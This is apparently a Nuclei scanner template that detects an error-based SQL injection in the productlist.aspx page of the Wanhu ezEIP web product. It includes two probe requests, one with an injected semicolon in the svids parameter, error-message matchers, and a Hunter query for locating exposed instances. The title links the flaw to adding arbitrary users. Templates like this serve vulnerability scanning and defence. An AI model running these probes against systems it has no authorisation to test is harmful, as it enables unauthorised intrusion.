http:
    - matchers:
        - dsl:
            - status_code_1 == 200 && status_code_2 == 200 && contains_all(body_1,'错误信息','列名','HttpUnhandledException') && contains_all(body_2,'错误信息','附近有语法错误','HttpUnhandledException')
          type: dsl
      raw:
        - |
          GET /shop/productlist.aspx?ob=price&price=asc&svids=cnvd HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
        - |
          GET /shop/productlist.aspx?ob=price&price=asc&svids=cnvd; HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
id: wanhu-ezeip-productlist-sqli-to-useradd
info:
    author: pphua
    metadata:
        hunter-query: app.name="万户 ezEip"
        veified: true
    name: 万户ezeip productlist.aspx sql注入导致任意用户添加
    reference:
        - none
    severity: high
    tags:
        - wanhu
        - ezeip
        - useradd
        - 万户ezEIP
